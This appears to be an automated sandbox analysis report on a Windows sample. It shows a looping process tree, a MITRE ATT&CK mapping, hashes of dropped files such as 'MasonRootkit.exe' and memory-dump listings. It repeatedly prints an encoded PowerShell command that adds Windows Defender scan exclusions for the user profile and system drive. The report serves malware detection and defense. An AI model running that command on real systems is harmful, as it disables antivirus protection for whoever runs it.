        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        179⤵
        
        PID:7632
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        180⤵
        
        PID:7904
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        180⤵
        
        PID:8060
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        180⤵
        
        PID:7248
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        181⤵
        
        PID:5124
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        181⤵
        
        PID:7200
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        181⤵
        
        PID:1372
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        182⤵
        
        PID:5248
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        182⤵
        
        PID:5788
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        182⤵
        
        PID:5296
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        183⤵
        
        PID:5832
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        183⤵
        
        PID:884
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        183⤵
        
        PID:6020
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        184⤵
        
        PID:2376
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        184⤵
        
        PID:7820
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        184⤵
        
        PID:3756
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        185⤵
        
        PID:5240
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        185⤵
        
        PID:6640
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        185⤵
        
        PID:8084
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        186⤵
        
        PID:7152
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        186⤵
        
        PID:6848
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        186⤵
        
        PID:2016
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        187⤵
        
        PID:7140
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        187⤵
        
        PID:1372
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        187⤵
        
        PID:624
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        188⤵
        
        PID:896
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        188⤵
        
        PID:6628
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        188⤵
        
        PID:544
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        189⤵
        
        PID:672
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        189⤵
        
        PID:3624
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        189⤵
        
        PID:8048
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        190⤵
        
        PID:1144
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        190⤵
        
        PID:4636
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        190⤵
        
        PID:1576

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{2317fe1d-c7e2-4631-838f-26fe40536352}
1⤵
PID:5912

C:\Users\Admin\AppData\Roaming\WMI Provider Host.exe
"C:\Users\Admin\AppData\Roaming\WMI Provider Host.exe"
1⤵
PID:6316

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:4180

C:\Users\Admin\AppData\Roaming\WMI Provider Host.exe
"C:\Users\Admin\AppData\Roaming\WMI Provider Host.exe"
1⤵
PID:2180

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\MasonRootkit.exe

Filesize
596KB

MD5
bb2fd6c1b233fd2f08a6a43ef860bcb6

SHA1
1cd9ea091bc0d7f907fcd8cf8c8b9d3187e6dc04

SHA256
8c4cddfb3723ecf013526733f93bd5f4408bc463c6a28ccb41b3fb63504ee9ce

SHA512
2ee649cf68e5121bd4ad3e51bdf0c71d773a8d0c67ce262356156b312221285bf62409ac2e2c5c5748adc31d3c94b24777f2918bdb9fcf488c61b0e2c6dc50b5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MasonRootkit.exe.log

Filesize
1KB

MD5
3982d6d16fd43ae609fd495bb33433a2

SHA1
6c33cd681fdfd9a844a3128602455a768e348765

SHA256
9a0a58776494250224706cbfbb08562eec3891fb988f17d66d0d8f9af4253cf9

SHA512
4b69315f5d139b8978123bebd417231b28f86b6c1433eb88105465a342339c6c6b8c240a2ca8d2a9c1fca20136c8c167b78a770ab0664231f6e1742291cbf1aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WMI Provider Host.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
124edf3ad57549a6e475f3bc4e6cfe51

SHA1
80f5187eeebb4a304e9caa0ce66fcd78c113d634

SHA256
638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675

SHA512
b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
85c81dabc726de9ee51770c9252945db

SHA1
833e400b670e32bdae4ba7c0dc510abb228e1cfb

SHA256
5c4c15a1fdb70ff7f2d838e92b4710b02a99155b5226588b5e1571f1a54f41f7

SHA512
ca0213dc31475de73a402abdbbdb133de81f5622d7b94df26fe6e13ea0afd2912f727b31a9242ddddcd3523570bcddbad0f189b64ac9154a31c169eeee25019f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
739f7316da1dbbcbb859cef1e5f37ef5

SHA1
398bef92facaec2e4ef5c4883f6b25c9d5696b54

SHA256
ef40016fb037381339f6ac0ac5fbacf722a4c7f877f904289dc155ad37973b51

SHA512
d3e1896ae69fd62f643501f9e3258e15fff01b5513e840a5db3afb41419344e75f19366cf17d6dece12efa0c3ff60f972977accc8d124c4c78b4c0c98a749c33

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
968a208e19bccf0f516cfe1373ede747

SHA1
8a4b4becc214e9d31cc6f8845ebe814aecd0f193

SHA256
d03cc190d944d7eb3bcb26f287bcf298cd20496b9c9d801d027e2269347fe19a

SHA512
e3b963e030ba7adc5208fbdd69d0d8462767d64786154c916c0e1a9d5dbda176e624d58f9d8d81b99b3cbec554d97c9c626b27b52b4f190fd99873e0de9b2440

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
af5e74201e513ee17d9865e9671dd5b3

SHA1
d7003c8706de11ddedf0cd900c64c9630a12e5fb

SHA256
9b89cbacc3c0288dd28c631ec2dab7d38c2b97ca91afa47d1cd7e304855a56af

SHA512
34402420aca12de4af01ac4ae887f333ce55f1acc7ac00c1eee040d1f571751b15f624a6816169ad9dfcc65b29007f0aedfae62d69e5afd501bb6083e55c6b3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
d45ee9af1fe389273db0244ce251bedf

SHA1
52dcd6f93d7e2a2d41e9e6155003ba0c582a6039

SHA256
6435334375162d812569ed10f0c7fe3fc164fc4bb355d7bc57b794cdbdf76a4d

SHA512
26181b79f23e850b941b83d9e1969278cfcf8f43c1100f7618aff01448c8e3d96d747278fda8841595a9a2fc0eff731ff9e717fc1ef3d6c0ebbac232fc6294a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe

Filesize
612KB

MD5
5e1eb1a67d40ccae40dee2a037ca6c64

SHA1
786b54d3d451ea40faeeb20fd30a38744862eeb5

SHA256
80e5cb11ae2512da3b7be501b469d6fc1a69a2017a143b9897023da9e366325f

SHA512
0484da209f0c8edff5d1f08b841f3134008ff72fb563fa48a15f96c8ad23fdfb82cc8a59bc729f2db3d359e18558d6f4fbaf4b40955a38787472db438a043205

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0fl3skco.3bx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpE06D.tmp.bat

Filesize
164B

MD5
51b66f2566efdc7371c8fd3b7660d413

SHA1
15655a16549a29e5b1e67c8c09c58adb12c053f0

SHA256
76cc2291fdec9b2a4840d5e298cca4ebc853ff41697248a94601e1b1497d7f45

SHA512
322b4d685fb02a0466a17841a7a1809877baa108a38e3857fb7227788b8e7833b48d60d6346fdc37ccbd47c1fc5be84983e993ebeee19ead1dd75486dd2eff3b

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan

Filesize
3KB

MD5
1babe42c0fe77bbcc6f201422e02a6f1

SHA1
01d659837044faba4b5133ca64ae3efcf2540b6a

SHA256
c168b05bf0e2c46c348a2280ba49516222bb389aa85ae25ba317424424790f49

SHA512
2e454f614797abba48ac813bcc155bdf0e15f57bfe97ad355b7c61c63ea44ad1b1f8fdda0ab3e6c8e68c46bd384d64d9901e643de89dbb48d8023b7ae25464cc

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
2KB

MD5
7d612892b20e70250dbd00d0cdd4f09b

SHA1
63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

SHA256
727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

SHA512
f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
0b990e24f1e839462c0ac35fef1d119e

SHA1
9e17905f8f68f9ce0a2024d57b537aa8b39c6708

SHA256
a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

SHA512
c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

Download Submit
C:\Windows\WMI Provider Host.exe

Filesize
55KB

MD5
ea7b08e9e1d22e568910a55a037dd3fe

SHA1
d3da55013c00e2975e8a4bccb68e2232c40f13b2

SHA256
2924bae2e5c8508acfc5ad387110ae09052dfd7afc5273a3c733aced3dbaf0a9

SHA512
86e7cd7c2f8083c594527b4a69f1aacfb14cdc8803bb4404f5e9d7c8b14eef059b8f6dc2e1afc9478a6268f2f45cf1ae99ef07bb83697582b6339bfec809a9cc

Download Submit
memory/384-1336-0x0000022603250000-0x000002260340B000-memory.dmp

Filesize
1.7MB

Download
memory/384-1341-0x0000022603250000-0x000002260340B000-memory.dmp

Filesize
1.7MB

Download
memory/384-1337-0x0000022603250000-0x000002260340B000-memory.dmp

Filesize
1.7MB

Download
memory/384-1338-0x0000022603250000-0x000002260340B000-memory.dmp

Filesize
1.7MB

Download
memory/384-1343-0x00007FF7F5B90000-0x00007FF7F5BA0000-memory.dmp

Filesize
64KB

Download
memory/384-1339-0x0000022603250000-0x000002260340B000-memory.dmp

Filesize
1.7MB

Download
memory/392-2701-0x00000000003B0000-0x00000000003C4000-memory.dmp

Filesize
80KB

Download
memory/616-1332-0x000002CC7AB80000-0x000002CC7AD3B000-memory.dmp

Filesize
1.7MB

Download
memory/616-1325-0x000002CC79000000-0x000002CC7913E000-memory.dmp

Filesize
1.2MB

Download
memory/616-1328-0x000002CC7AB80000-0x000002CC7AD3B000-memory.dmp

Filesize
1.7MB

Download
memory/616-1330-0x000002CC7AB80000-0x000002CC7AD3B000-memory.dmp

Filesize
1.7MB

Download
memory/616-1333-0x00007FF7F5B90000-0x00007FF7F5BA0000-memory.dmp

Filesize
64KB

Download
memory/616-1331-0x000002CC7AB80000-0x000002CC7AD3B000-memory.dmp

Filesize
1.7MB

Download
memory/616-1329-0x000002CC7AB80000-0x000002CC7AD3B000-memory.dmp

Filesize
1.7MB

Download
memory/676-1340-0x000001E92E5E0000-0x000001E92E79B000-memory.dmp

Filesize
1.7MB

Download
memory/676-1345-0x000001E92E5E0000-0x000001E92E79B000-memory.dmp

Filesize
1.7MB

Download
memory/676-1347-0x000001E92E5E0000-0x000001E92E79B000-memory.dmp

Filesize
1.7MB

Download
memory/676-1346-0x000001E92E5E0000-0x000001E92E79B000-memory.dmp

Filesize
1.7MB

Download
memory/676-1348-0x00007FF7F5B90000-0x00007FF7F5BA0000-memory.dmp

Filesize
64KB

Download
memory/676-1342-0x000001E92E5E0000-0x000001E92E79B000-memory.dmp

Filesize
1.7MB

Download
memory/1472-2330-0x00000000008F0000-0x0000000000904000-memory.dmp

Filesize
80KB

Download
memory/1836-3952-0x0000000000650000-0x0000000000664000-memory.dmp

Filesize
80KB

Download
memory/1836-4133-0x0000000000B60000-0x0000000000B74000-memory.dmp

Filesize
80KB

Download
memory/1896-2377-0x00000000005A0000-0x00000000005B4000-memory.dmp

Filesize
80KB

Download
memory/1908-3796-0x0000000000300000-0x0000000000314000-memory.dmp

Filesize
80KB

Download
memory/1992-340-0x0000000070650000-0x000000007069C000-memory.dmp

Filesize
304KB

Download
memory/2044-2974-0x0000000000D70000-0x0000000000D84000-memory.dmp

Filesize
80KB

Download
memory/2116-2535-0x0000000000650000-0x0000000000664000-memory.dmp

Filesize
80KB

Download
memory/2140-3713-0x0000000000110000-0x0000000000124000-memory.dmp

Filesize
80KB

Download
memory/2180-3730-0x00000000000A0000-0x00000000000B4000-memory.dmp

Filesize
80KB

Download
memory/2204-142-0x0000000007480000-0x0000000007491000-memory.dmp

Filesize
68KB

Download
memory/2204-187-0x00000000075D0000-0x00000000075EA000-memory.dmp

Filesize
104KB

Download
memory/2204-20-0x0000000005930000-0x0000000005996000-memory.dmp

Filesize
408KB

Download
memory/2204-19-0x00000000058C0000-0x0000000005926000-memory.dmp

Filesize
408KB

Download
memory/2204-17-0x0000000004FB0000-0x0000000004FD2000-memory.dmp

Filesize
136KB

Download
memory/2204-36-0x00000000059A0000-0x0000000005CF4000-memory.dmp

Filesize
3.3MB

Download
memory/2204-51-0x00000000064E0000-0x000000000652C000-memory.dmp

Filesize
304KB

Download
memory/2204-50-0x0000000005F60000-0x0000000005F7E000-memory.dmp

Filesize
120KB

Download
memory/2204-163-0x00000000074E0000-0x00000000074EE000-memory.dmp

Filesize
56KB

Download
memory/2204-188-0x00000000075C0000-0x00000000075C8000-memory.dmp

Filesize
32KB

Download
memory/2204-80-0x0000000006F80000-0x0000000006FB2000-memory.dmp

Filesize
200KB

Download
memory/2204-131-0x0000000007510000-0x00000000075A6000-memory.dmp

Filesize
600KB

Download
memory/2204-92-0x00000000071C0000-0x0000000007263000-memory.dmp

Filesize
652KB

Download
memory/2204-174-0x00000000074F0000-0x0000000007504000-memory.dmp

Filesize
80KB

Download
memory/2204-91-0x00000000064A0000-0x00000000064BE000-memory.dmp

Filesize
120KB

Download
memory/2204-81-0x0000000070650000-0x000000007069C000-memory.dmp

Filesize
304KB

Download
memory/2204-117-0x00000000078F0000-0x0000000007F6A000-memory.dmp

Filesize
6.5MB

Download
memory/2204-120-0x00000000072F0000-0x00000000072FA000-memory.dmp

Filesize
40KB

Download
memory/2204-118-0x0000000007290000-0x00000000072AA000-memory.dmp

Filesize
104KB

Download
memory/2288-189-0x0000000070650000-0x000000007069C000-memory.dmp

Filesize
304KB

Download
memory/2292-164-0x0000000070650000-0x000000007069C000-memory.dmp

Filesize
304KB

Download
memory/2608-2114-0x0000000000430000-0x0000000000444000-memory.dmp

Filesize
80KB

Download
memory/2732-483-0x000000001C480000-0x000000001C492000-memory.dmp

Filesize
72KB

Download
memory/2732-584-0x000000001B5F0000-0x000000001B600000-memory.dmp

Filesize
64KB

Download
memory/2732-11-0x00007FF8176B3000-0x00007FF8176B5000-memory.dmp

Filesize
8KB

Download
memory/2732-12-0x00000000008D0000-0x00000000008E4000-memory.dmp

Filesize
80KB

Download
memory/2732-297-0x000000001B5F0000-0x000000001B600000-memory.dmp

Filesize
64KB

Download
memory/2856-3175-0x0000000000570000-0x0000000000584000-memory.dmp

Filesize
80KB

Download
memory/3088-280-0x0000000070650000-0x000000007069C000-memory.dmp

Filesize
304KB

Download
memory/3248-2048-0x0000000000350000-0x0000000000364000-memory.dmp

Filesize
80KB

Download
memory/3364-2622-0x0000000000310000-0x0000000000324000-memory.dmp

Filesize
80KB

Download
memory/3520-325-0x0000000070650000-0x000000007069C000-memory.dmp

Filesize
304KB

Download
memory/3548-219-0x0000000070650000-0x000000007069C000-memory.dmp

Filesize
304KB

Download
memory/3980-98-0x0000000070650000-0x000000007069C000-memory.dmp

Filesize
304KB

Download
memory/3980-13-0x00000000749FE000-0x00000000749FF000-memory.dmp

Filesize
4KB

Download
memory/3980-15-0x0000000004E90000-0x0000000004EC6000-memory.dmp

Filesize
216KB

Download
memory/3980-16-0x0000000005500000-0x0000000005B28000-memory.dmp

Filesize
6.2MB

Download
memory/3980-296-0x00000000749FE000-0x00000000749FF000-memory.dmp

Filesize
4KB

Download
memory/3984-2074-0x0000000000C40000-0x0000000000C54000-memory.dmp

Filesize
80KB

Download
memory/4064-153-0x0000000070650000-0x000000007069C000-memory.dmp

Filesize
304KB

Download
memory/4148-403-0x0000000070650000-0x000000007069C000-memory.dmp

Filesize
304KB

Download
memory/4152-308-0x0000000070650000-0x000000007069C000-memory.dmp

Filesize
304KB

Download
memory/4180-893-0x0000021FA8120000-0x0000021FA8121000-memory.dmp

Filesize
4KB

Download
memory/4180-895-0x0000021FA8120000-0x0000021FA8121000-memory.dmp

Filesize
4KB

Download
memory/4180-896-0x0000021FA8120000-0x0000021FA8121000-memory.dmp

Filesize
4KB

Download
memory/4180-883-0x0000021FA8120000-0x0000021FA8121000-memory.dmp

Filesize
4KB

Download
memory/4180-885-0x0000021FA8120000-0x0000021FA8121000-memory.dmp

Filesize
4KB

Download
memory/4180-894-0x0000021FA8120000-0x0000021FA8121000-memory.dmp

Filesize
4KB

Download
memory/4180-891-0x0000021FA8120000-0x0000021FA8121000-memory.dmp

Filesize
4KB

Download
memory/4180-892-0x0000021FA8120000-0x0000021FA8121000-memory.dmp

Filesize
4KB

Download
memory/4180-884-0x0000021FA8120000-0x0000021FA8121000-memory.dmp

Filesize
4KB

Download
memory/4180-890-0x0000021FA8120000-0x0000021FA8121000-memory.dmp

Filesize
4KB

Download
memory/4268-175-0x00000275F8830000-0x00000275F89F2000-memory.dmp

Filesize
1.8MB

Download
memory/4268-93-0x00000275F6110000-0x00000275F6132000-memory.dmp

Filesize
136KB

Download
memory/4268-176-0x00000275F8F30000-0x00000275F9458000-memory.dmp

Filesize
5.2MB

Download
memory/4784-229-0x0000000070650000-0x000000007069C000-memory.dmp

Filesize
304KB

Download
memory/4976-121-0x0000000070650000-0x000000007069C000-memory.dmp

Filesize
304KB

Download
